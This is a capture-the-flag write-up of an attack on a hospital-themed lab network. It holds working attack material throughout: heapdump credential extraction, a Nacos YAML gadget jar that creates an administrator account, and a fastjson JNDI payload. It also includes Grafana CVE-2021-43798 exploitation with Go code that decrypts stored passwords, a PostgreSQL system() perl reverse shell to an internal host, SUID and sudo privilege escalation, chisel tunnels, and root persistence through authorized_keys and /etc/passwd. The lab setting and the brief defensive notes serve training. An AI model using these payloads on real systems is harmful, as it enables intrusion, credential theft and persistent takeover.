Hospital Writeup

External reconnaissance

D:\桌面\信息收集\fscan2>fscan.exe -h 39.99.146.10

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] Scan type: all, target ports: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] Starting information scan...
[*] Final valid host count: 1
[*] Parsed 218 valid ports in total
[+] Port open 39.99.146.10:22
[+] Port open 39.99.146.10:8080
[+] Live port count: 2
[*] Starting vulnerability scan...
[*] Web title http://39.99.146.10:8080 status:302 length:0 title:(none) redirect: http://39.99.146.10:8080/login;jsessionid=935B60352AE61077035EC687C20917ED
[*] Web title http://39.99.146.10:8080/login;jsessionid=935B60352AE61077035EC687C20917ED status:200 length:2005 title:医疗管理后台 (Medical Management Backend)
[!] Scan error 39.99.146.10:22 - total scan time exceeded: context deadline exceeded
[+] [Vulnerability found] target: http://39.99.146.10:8080
Vuln type: poc-yaml-spring-actuator-heapdump-file
Vuln name:
Details: %!s(<nil>)
[+] Scan complete: 2/2
[*] Scan finished, elapsed: 22.9915811s

Medical Management Backend (医疗管理后台)

The weak credentials admin/admin123 get you in.

It turns out to be a pure front-end interface with nothing to exploit behind it, so information gathering on this IP continues.

Spring Boot Heapdump

fscan reported poc-yaml-spring-actuator-heapdump-file, i.e. the Actuator heapdump endpoint is exposed without authentication.

Download the heapdump and analyse it with JDumpSpider-1.1-SNAPSHOT-full.jar.
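What JDumpSpider does in its first pass, as an added example in Go (not the writeup's code and not JDumpSpider's): pull printable runs out of the HPROF bytes, then keep the ones shaped like a JDBC URL or a password/secret assignment. The sampleHeap bytes are constructed for the example and are not from a real dump; the function names are mine.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
)

// Constructed sample: binary noise around a few UTF-8 strings, the way
// credentials sit inside a Spring Boot HPROF heap dump. Not a real dump.
var sampleHeap = []byte("\x00\x01HPROF\x00\x00spring.datasource.url\x00\x00" +
	"jdbc:mysql://localhost:3306/test?useSSL=false\x00\x00\x00" +
	"\x02\x7fspring.datasource.password=P@ssWord!!!\x00\x00" +
	"\x00short\x00\x00\x03\x04redis.host: localhost\x00")

// printableRuns extracts runs of printable ASCII at least minLen long,
// the same first step strings(1) performs on a binary.
func printableRuns(data []byte, minLen int) []string {
	var runs []string
	start := -1
	for i, b := range data {
		if b >= 0x20 && b <= 0x7e {
			if start < 0 {
				start = i
			}
			continue
		}
		if start >= 0 && i-start >= minLen {
			runs = append(runs, string(data[start:i]))
		}
		start = -1
	}
	if start >= 0 && len(data)-start >= minLen {
		runs = append(runs, string(data[start:]))
	}
	return runs
}

// secretPatterns are the shapes worth pulling out of a heap: JDBC URLs and
// key=value / key: value pairs whose key names a credential.
var secretPatterns = []*regexp.Regexp{
	regexp.MustCompile(`(?i)jdbc:[a-z0-9]+://[^\s"']+`),
	regexp.MustCompile(`(?i)(password|passwd|secret|cipherkey|accesskey)\s*[=:]\s*\S+`),
}

// ExtractSecrets returns the de-duplicated, sorted candidate credentials
// found in a heap dump.
func ExtractSecrets(data []byte) []string {
	seen := map[string]bool{}
	for _, s := range printableRuns(data, 8) {
		for _, re := range secretPatterns {
			for _, m := range re.FindAllString(s, -1) {
				seen[m] = true
			}
		}
	}
	out := make([]string, 0, len(seen))
	for k := range seen {
		out = append(out, k)
	}
	sort.Strings(out)
	return out
}

func main() {
	for _, s := range ExtractSecrets(sampleHeap) {
		fmt.Println(s)
	}
}
```

Against a real heapdump you would read the file into data instead of the constructed bytes; the run length threshold of 8 keeps the noise down, and anything a regex misses is still in printableRuns for manual grepping.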

Shiro Deserialization

getshell

Vim.basic privilege escalation

find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/vim.basic
/usr/bin/su
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/stapbpf
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device


# vim.basic is SUID root, so it opens files with root's privileges and the flag can be read directly
vim.basic /root/flag/flag01.txt

Internal network penetration

Internal reconnaissance

app@web01:/tmp$ ./fscan -h 172.30.12.1/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-03-13 11:43:38] [INFO] Brute-force threads: 1
[2025-03-13 11:43:38] [INFO] Starting information scan
[2025-03-13 11:43:38] [INFO] CIDR range: 172.30.12.0-172.30.12.255
[2025-03-13 11:43:38] [INFO] Generated IP range: 172.30.12.0.%!d(string=172.30.12.255) - %!s(MISSING).%!d(MISSING)
[2025-03-13 11:43:38] [INFO] Parsed CIDR 172.30.12.1/24 -> IP range 172.30.12.0-172.30.12.255
[2025-03-13 11:43:38] [INFO] Final valid host count: 256
[2025-03-13 11:43:39] [INFO] Starting host scan
[2025-03-13 11:43:39] [INFO] Trying listener-less ICMP probing...
[2025-03-13 11:43:39] [INFO] Current user lacks the privilege to send ICMP packets
[2025-03-13 11:43:39] [INFO] Falling back to ping-based probing...
[2025-03-13 11:43:39] [SUCCESS] Target 172.30.12.5 alive (ICMP)
[2025-03-13 11:43:39] [SUCCESS] Target 172.30.12.6 alive (ICMP)
[2025-03-13 11:43:43] [SUCCESS] Target 172.30.12.236 alive (ICMP)
[2025-03-13 11:43:45] [INFO] Live host count: 3
[2025-03-13 11:43:45] [INFO] Valid port count: 233
[2025-03-13 11:43:45] [SUCCESS] Port open 172.30.12.6:135
[2025-03-13 11:43:45] [SUCCESS] Port open 172.30.12.6:139
[2025-03-13 11:43:45] [SUCCESS] Port open 172.30.12.6:445
[2025-03-13 11:43:45] [SUCCESS] Port open 172.30.12.236:22
[2025-03-13 11:43:45] [SUCCESS] Port open 172.30.12.5:22
[2025-03-13 11:43:45] [SUCCESS] Port open 172.30.12.236:8009
[2025-03-13 11:43:45] [SUCCESS] Port open 172.30.12.5:8080
[2025-03-13 11:43:45] [SUCCESS] Port open 172.30.12.236:8080
[2025-03-13 11:43:45] [SUCCESS] Port open 172.30.12.6:8848
[2025-03-13 11:43:45] [SUCCESS] Service identified 172.30.12.236:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.9 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-03-13 11:43:45] [SUCCESS] Service identified 172.30.12.5:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.9 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-03-13 11:43:50] [SUCCESS] Service identified 172.30.12.6:139 => Banner:[.]
[2025-03-13 11:43:50] [SUCCESS] Service identified 172.30.12.6:445 =>
[2025-03-13 11:43:50] [SUCCESS] Service identified 172.30.12.236:8009 =>
[2025-03-13 11:43:50] [SUCCESS] Service identified 172.30.12.5:8080 => [http]
[2025-03-13 11:43:51] [SUCCESS] Service identified 172.30.12.236:8080 => [http]
[2025-03-13 11:43:55] [SUCCESS] Service identified 172.30.12.6:8848 => [http]
[2025-03-13 11:44:50] [SUCCESS] Service identified 172.30.12.6:135 =>
[2025-03-13 11:44:50] [INFO] Live port count: 9
[2025-03-13 11:44:50] [INFO] Starting vulnerability scan
[2025-03-13 11:44:50] [INFO] Loaded plugins: findnet, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-03-13 11:44:50] [SUCCESS] NetInfo scan result
Target host: 172.30.12.6
Hostname: Server02
Discovered network interfaces:
IPv4 addresses:
└─ 172.30.12.6
[2025-03-13 11:44:50] [SUCCESS] NetBios 172.30.12.6 WORKGROUP\SERVER02
[2025-03-13 11:44:50] [SUCCESS] Web title http://172.30.12.5:8080 status:302 length:0 title:(none) redirect: http://172.30.12.5:8080/login;jsessionid=77899D13F4306070E6BD10E1C48406CB
[2025-03-13 11:44:50] [SUCCESS] Web title http://172.30.12.236:8080 status:200 length:3964 title:医院后台管理平台 (Hospital Backend Management Platform)
[2025-03-13 11:44:51] [SUCCESS] Web title http://172.30.12.5:8080/login;jsessionid=77899D13F4306070E6BD10E1C48406CB status:200 length:2005 title:医疗管理后台 (Medical Management Backend)
[2025-03-13 11:44:51] [SUCCESS] Web title http://172.30.12.6:8848 status:404 length:431 title:HTTP Status 404 – Not Found
[2025-03-13 11:44:51] [SUCCESS] Target: http://172.30.12.6:8848
Vuln type: poc-yaml-alibaba-nacos
Vuln name:
Details:
author:AgeloVito
links:https://blog.csdn.net/caiqiiqi/article/details/112005424
[2025-03-13 11:44:52] [SUCCESS] Target: http://172.30.12.6:8848
Vuln type: poc-yaml-alibaba-nacos-v1-auth-bypass
Vuln name:
Details:
author:kmahyyg(https://github.com/kmahyyg)
links:https://github.com/alibaba/nacos/issues/4593
[2025-03-13 11:44:52] [SUCCESS] Target: http://172.30.12.5:8080
Vuln type: poc-yaml-spring-actuator-heapdump-file
Vuln name:
Details:
author:AgeloVito
links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-03-13 11:51:05] [SUCCESS] Scan complete: 16/16

Nacos

The weak credentials nacos/nacos get you in.

The configuration retrieved from it:

server:
  port: 8080
  servlet:
    context-path: /hello

spring:
  application:
    name: db-config
  cloud:
    nacos:
      discovery:
        server-addr: 127.0.0.1:8848
      config:
        server-addr: 127.0.0.1:8848
        file-extension: yaml
        namespace: dev
        group: DEFAULT_GROUP
        data-id: db-config.yaml
  datasource:
    mysql:
      url: jdbc:mysql://localhost:3306/test?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
      username: root
      password: P@ssWord!!!
    redis:
      host: localhost
      port: 6379

management:
  endpoints:
    web:
      exposure:
        include: '*'

Sensitive info: mysql:root:P@ssWord!!!

Also note management.endpoints.web.exposure.include: '*' at the bottom: that setting is what puts /actuator/heapdump on the network, which is the fscan finding from the start. The fix is to list only the endpoints actually needed (health, info) and to set management.endpoint.heapdump.enabled: false.

Nacos Client YAML Deserialization

Use: https://github.com/charonlight/NacosExploitGUI/tree/main/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E7%8E%AF%E5%A2%83/nacos-client_yaml_deserialize/yaml-payload/src/artsploit

Only the body of AwesomeScriptEngineFactory.java needs changing; the simplest choice here is to add an administrator account (the Nacos host is the Windows machine Server02):

// Constructor of the ScriptEngineFactory that the malicious jar registers in
// META-INF/services. The SnakeYAML gadget instantiates it as soon as the jar
// is loaded, so these commands run on the Nacos host with its privileges.
public AwesomeScriptEngineFactory() {
    try {
        Runtime.getRuntime().exec("net user hey 626620a /add");
        Runtime.getRuntime().exec("net localgroup administrators hey /add");
    } catch (IOException e) {
        e.printStackTrace();
    }
}

A ready-made packaging .bat is provided, which is convenient; after packaging it produces yaml-payload.jar.

Upload the malicious yaml-payload.jar to the web01 host and start an HTTP server there:

root@web01:~# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
172.30.12.6 - - [29/Dec/2023 14:52:42] "GET /yaml-payload.jar HTTP/1.1" 200 -

Use charonlight/NacosExploitGUI to make the Nacos server load the malicious yaml-payload.jar from the remote host (the GET /yaml-payload.jar from 172.30.12.6 in the log above is that fetch):

RDP in with the hey account the payload created.

Hospital Backend Management Platform (医院后台管理平台)

Weak credentials, backend brute forcing and vulnerability scanning all came up empty, so the next step is to capture and inspect the traffic.

The data is transmitted as JSON,

and the fingerprinting tool reports a Java stack, which immediately suggests fastjson.

Fastjson Deserialization

Version detection

Vulnerability check

Inject an in-memory webshell
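Both the Nacos client step above and the fastjson step come down to a text body handed to an unsafe deserializer, and both leave recognisable markers. As an added example in Go (not the writeup's code, and not NacosExploitGUI's or any fastjson tool's): BuildSnakeYamlPayload produces the SnakeYAML trigger that artsploit's yaml-payload project documents, pointing at the jar served from web01, and Scan is the defender-side check that matches Nacos config bodies and JSON request bodies against those markers. The jar URL, the LDAP address and the sample bodies are constructed assumptions.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// BuildSnakeYamlPayload returns the SnakeYAML gadget used by artsploit's
// yaml-payload project: an unsafe `new Yaml().load()` on the nacos-client
// side constructs a ScriptEngineManager over a URLClassLoader, which fetches
// the jar and instantiates the ScriptEngineFactory named in its
// META-INF/services, running that class's constructor.
func BuildSnakeYamlPayload(jarURL string) string {
	return fmt.Sprintf(`!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["%s"]]]]`, jarURL)
}

// indicators are strings a legitimate Nacos config body or JSON request body
// has no reason to contain.
var indicators = []struct {
	name string
	re   *regexp.Regexp
}{
	{"snakeyaml-tag", regexp.MustCompile(`!!(javax\.script\.ScriptEngineManager|java\.net\.URLClassLoader|java\.net\.URL)\b`)},
	{"fastjson-autotype", regexp.MustCompile(`"@type"\s*:\s*"`)},
	{"fastjson-jndi-gadget", regexp.MustCompile(`com\.sun\.rowset\.JdbcRowSetImpl|org\.apache\.commons\.(dbcp|configuration)|javax\.naming\.InitialContext`)},
	{"jndi-url", regexp.MustCompile(`(?i)"(ldap|rmi)://[^"]+"`)},
}

// Scan returns the names of the indicators present in body, in table order.
func Scan(body string) []string {
	var hits []string
	for _, ind := range indicators {
		if ind.re.MatchString(body) {
			hits = append(hits, ind.name)
		}
	}
	return hits
}

// Constructed samples (not captured from the range): a benign config, the
// gadget pointing at the web01 HTTP server, a benign login body and a
// fastjson JNDI probe body.
var samples = []struct{ name, body string }{
	{"nacos-benign", "spring:\n  datasource:\n    url: jdbc:mysql://localhost:3306/test\n"},
	{"nacos-gadget", BuildSnakeYamlPayload("http://172.30.12.5/yaml-payload.jar")},
	{"json-benign", `{"username":"admin","password":"admin123"}`},
	{"json-fastjson", `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.30.12.5:1389/a","autoCommit":true}`},
}

func main() {
	for _, s := range samples {
		fmt.Printf("%-14s %s\n", s.name, strings.Join(Scan(s.body), ","))
	}
}
```

Scan is deliberately tag-based rather than parsing: the YAML tag and the "@type" key are the parts an attacker cannot remove, so matching them in a WAF rule or over the Nacos config store (every data-id in every namespace) catches the technique regardless of which gadget class follows.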

Information gathering on the compromised host (web2)

It has two NICs

Second-level tunnel setup

Because the compromised host (web2) above has two NICs, multi-level tunnelling is needed from here on.

VPS -> external target -> internal host 2 -> internal host 3

chisel multi-level tunnel setup

Start the server on the external target:

./chisel server -p 7001 --reverse

Start the client on the dual-NIC machine.

First reverse the dual-NIC machine's shell to the entry machine (which has an interactive terminal). The client must dial the port the server listens on (7001 in the server command above); R:0.0.0.0:7000:socks asks the server to open a SOCKS5 listener on port 7000 of the external target, which is what the proxy chain below points at.

./chisel client 172.30.12.5:7002 R:0.0.0.0:7000:socks

Build the proxy chain locally in Proxifier

proxychains.conf

The complete multi-level proxy is now:

Internet -> 47.xx.xx.xx:6666 (My_VPS) -> 172.30.12.5:7000 (external target) -> 172.30.54.12 (dual-NIC machine)

Internal reconnaissance 2

./fscan -h 172.30.54.1/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-03-13 15:05:20] [INFO] Brute-force threads: 1
[2025-03-13 15:05:20] [INFO] Starting information scan
[2025-03-13 15:05:20] [INFO] CIDR range: 172.30.54.0-172.30.54.255
[2025-03-13 15:05:20] [INFO] Generated IP range: 172.30.54.0.%!d(string=172.30.54.255) - %!s(MISSING).%!d(MISSING)
[2025-03-13 15:05:20] [INFO] Parsed CIDR 172.30.54.1/24 -> IP range 172.30.54.0-172.30.54.255
[2025-03-13 15:05:20] [INFO] Final valid host count: 256
[2025-03-13 15:05:20] [INFO] Starting host scan
[2025-03-13 15:05:20] [SUCCESS] Target 172.30.54.179 alive (ICMP)
[2025-03-13 15:05:20] [SUCCESS] Target 172.30.54.12 alive (ICMP)
[2025-03-13 15:05:23] [INFO] Live host count: 2
[2025-03-13 15:05:23] [INFO] Valid port count: 233
[2025-03-13 15:05:23] [SUCCESS] Port open 172.30.54.179:22
[2025-03-13 15:05:23] [SUCCESS] Port open 172.30.54.12:22
[2025-03-13 15:05:23] [SUCCESS] Port open 172.30.54.12:5432
[2025-03-13 15:05:23] [SUCCESS] Port open 172.30.54.12:3000
[2025-03-13 15:05:23] [SUCCESS] Port open 172.30.54.179:8009
[2025-03-13 15:05:23] [SUCCESS] Port open 172.30.54.179:8080
[2025-03-13 15:05:23] [SUCCESS] Service identified 172.30.54.179:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.9 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-03-13 15:05:23] [SUCCESS] Service identified 172.30.54.12:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.9 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-03-13 15:05:28] [SUCCESS] Service identified 172.30.54.12:5432 =>
[2025-03-13 15:05:28] [SUCCESS] Service identified 172.30.54.12:3000 => [http] Banner:[HTTP/1.1 400 Bad Request.Content-Type: text/plain; charset=utf-8.Connection: close.400 Bad Request]
[2025-03-13 15:05:29] [SUCCESS] Service identified 172.30.54.179:8009 =>
[2025-03-13 15:05:29] [SUCCESS] Service identified 172.30.54.179:8080 => [http]
[2025-03-13 15:05:29] [INFO] Live port count: 6
[2025-03-13 15:05:29] [INFO] Starting vulnerability scan
[2025-03-13 15:05:29] [INFO] Loaded plugins: postgres, ssh, webpoc, webtitle
[2025-03-13 15:05:29] [SUCCESS] Web title http://172.30.54.179:8080 status:200 length:3964 title:医院后台管理平台 (Hospital Backend Management Platform)
[2025-03-13 15:05:29] [SUCCESS] Web title http://172.30.54.12:3000 status:302 length:29 title:(none) redirect: http://172.30.54.12:3000/login
[2025-03-13 15:05:29] [SUCCESS] Web title http://172.30.54.12:3000/login status:200 length:27909 title:Grafana

Grafana data visualization platform

Grafana Unauthorized Arbitrary File Reading (CVE-2021-43798)

Use CVE-2021-43798 to read the database file (/var/lib/grafana/grafana.db) and the config file that holds the decryption key (/etc/grafana/grafana.ini), then decrypt the stored data-source credentials.

A-D-Team/grafanaExp does this in one step and prints the decrypted data_source entries:

root@web03:~# ./grafanaExp_linux_amd64 exp -u http://172.30.54.12:3000
2023/12/29 17:41:34 Target vulnerable has plugin [alertlist]
2023/12/29 17:41:34 Got secret_key [SW2YcwTIb9zpOOhoPsMm]
2023/12/29 17:41:34 There is [0] records in db.
2023/12/29 17:41:34 type:[postgres] name:[PostgreSQL] url:[localhost:5432] user:[postgres] password[Postgres@123]database:[postgres] basic_auth_user:[] basic_auth_password:[]
2023/12/29 17:41:34 All Done, have nice day!
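What grafanaExp does once it has both files, as an added example in Go (not the tool's code and not the writeup's): the secret_key from grafana.ini and an encrypted data-source password from grafana.db go through Grafana's legacy scheme, an 8-byte salt stored in front of the blob, PBKDF2-HMAC-SHA256 (10000 iterations, 32-byte key) and AES-CFB with a 16-byte IV, base64-encoded as a whole in the database. EncryptLegacy is included only so the example can build a blob to decrypt offline: the secret_key and password are the ones in the output above, but the ciphertext is produced here, not read from the range's database. TraversalPath shows the documented CVE-2021-43798 path shape with an assumed plugin name and traversal depth. Newer Grafana versions layer envelope encryption on top, so this recovers only values stored with the legacy scheme.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

const (
	saltLen    = 8     // Grafana prefixes each blob with an 8-char salt
	pbkdf2Iter = 10000 // iterations used by Grafana's encryptionKeyToBytes
	keyLen     = 32    // AES-256
)

// pbkdf2SHA256 is a minimal PBKDF2-HMAC-SHA256 (RFC 8018) so the example
// needs only the standard library.
func pbkdf2SHA256(password, salt []byte, iter, keyLen int) []byte {
	out := make([]byte, 0, keyLen+sha256.Size)
	for block := uint32(1); len(out) < keyLen; block++ {
		idx := make([]byte, 4)
		binary.BigEndian.PutUint32(idx, block)
		mac := hmac.New(sha256.New, password)
		mac.Write(salt)
		mac.Write(idx)
		u := mac.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iter; i++ {
			mac.Reset()
			mac.Write(u)
			u = mac.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// EncryptLegacy mirrors Grafana's legacy util.Encrypt: salt || iv || AES-CFB
// ciphertext, base64-encoded. Present only to build test data.
func EncryptLegacy(secret, plaintext string) (string, error) {
	const alnum = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	salt := make([]byte, saltLen)
	if _, err := rand.Read(salt); err != nil {
		return "", err
	}
	for i := range salt { // Grafana uses an alphanumeric random salt
		salt[i] = alnum[int(salt[i])%len(alnum)]
	}
	block, err := aes.NewCipher(pbkdf2SHA256([]byte(secret), salt, pbkdf2Iter, keyLen))
	if err != nil {
		return "", err
	}
	buf := make([]byte, saltLen+aes.BlockSize+len(plaintext))
	copy(buf, salt)
	iv := buf[saltLen : saltLen+aes.BlockSize]
	if _, err := rand.Read(iv); err != nil {
		return "", err
	}
	cipher.NewCFBEncrypter(block, iv).XORKeyStream(buf[saltLen+aes.BlockSize:], []byte(plaintext))
	return base64.StdEncoding.EncodeToString(buf), nil
}

// DecryptLegacy is the step grafanaExp performs with secret_key and a
// password value from the data_source table.
func DecryptLegacy(secret, b64 string) (string, error) {
	blob, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(blob) < saltLen+aes.BlockSize {
		return "", errors.New("ciphertext too short")
	}
	salt, iv, ct := blob[:saltLen], blob[saltLen:saltLen+aes.BlockSize], blob[saltLen+aes.BlockSize:]
	block, err := aes.NewCipher(pbkdf2SHA256([]byte(secret), salt, pbkdf2Iter, keyLen))
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCFBDecrypter(block, iv).XORKeyStream(pt, ct)
	return string(pt), nil
}

// TraversalPath builds the CVE-2021-43798 request path: the plugin asset
// handler joined the requested file name onto the plugin directory without
// normalising "..". Plugin name and depth are assumptions for the example.
func TraversalPath(plugin, target string) string {
	return "/public/plugins/" + plugin + "/../../../../../../../../" + strings.TrimPrefix(target, "/")
}

func main() {
	enc, _ := EncryptLegacy("SW2YcwTIb9zpOOhoPsMm", "Postgres@123")
	dec, _ := DecryptLegacy("SW2YcwTIb9zpOOhoPsMm", enc)
	fmt.Println(TraversalPath("alertlist", "/etc/grafana/grafana.ini"))
	fmt.Println(enc, "->", dec)
}
```

A wrong secret_key does not produce an error from DecryptLegacy, only garbage, so when a real grafana.db yields unreadable output the first thing to check is that the [security] secret_key you read really belongs to that instance.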

PostgreSQL

# connect through the proxy chain; enter Postgres@123 (from the grafanaExp output) at the password prompt
proxychains -q psql -h 172.30.54.12 -U postgres -W
Postgres@123

PostgreSQL penetration

Reference: https://tttang.com/archive/1547/#toc_0x06-postgresql

Create a function in psql that executes commands (LANGUAGE c requires superuser, which the postgres account is; it binds libc's system() directly):
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;

Reverse shell (dollar-quoted so the single quotes inside the perl one-liner need no escaping; with the default standard_conforming_strings=on, a backslash-escaped quote inside a plain '...' literal would terminate the string):
select system($cmd$perl -e 'use Socket;$i="172.30.54.179";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'$cmd$);

Upgrade to an interactive terminal:

python3 -c 'import pty;pty.spawn("/bin/bash")'

PostgreSQL privilege escalation (sudo is permitted for the psql binary; \? opens the help text in the pager, and a line starting with ! inside the pager runs a shell command, which inherits root):
sudo /usr/local/postgresql/bin/psql
\?
!/bin/bash

Tips

This range differs from earlier ones: it involves no domain penetration, but instead adds multi-layer proxying through a dual-NIC machine, which matches the real situation of the various targets in today's attack-defense exercises; everyone says a domain is nowadays something you can hope for but not count on. The overall difficulty is not high; at the end I got stuck on PostgreSQL for a long time, never having run into this kind of database penetration in practice. For multi-NIC machines, if it is Windows it is best to RDP in directly, which makes later shell interaction more convenient; in this case almost all machines were Linux, and my approach was basically to reverse the dual-NIC machine's shell back to the entry-point external target. The downside is that shell interaction is not so convenient and feels clumsy. Reviewing afterwards, I think we could take over the compromised host directly by changing the machine's password, adding a root user, or writing a public key to obtain root, and then manage the dual-NIC machine over ssh, which makes shell interaction in post-exploitation somewhat easier.

Writing a public key

# on your own machine
ssh-keygen -t rsa -b 4096
cat ~/.ssh/id_rsa.pub
# in the reverse shell (mkdir in case the directory is missing; > replaces any keys already there, use >> to append)
mkdir -p /root/.ssh
echo "<contents of ~/.ssh/id_rsa.pub>" > /root/.ssh/authorized_keys
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys

ssh -i ~/.ssh/id_rsa root@39.99.140.174

Adding a root user

openssl passwd -1 -salt test 1234    // generate the password hash
$1$test$So8QlDklBBy90T3QcEYWU/    // the result
test:$1$test$So8QlDklBBy90T3QcEYWU/:0:0:/root:/bin/bash    // the line to add: uid 0 and gid 0 make it root

Write it into /etc/passwd,
force-save with wq! (with the SUID vim.basic found earlier this works even from the unprivileged app shell, since vim writes the file as root),
then su test to switch to the new user.

Changing the password

passwd root
proxychains4 ssh root@172.30.12.236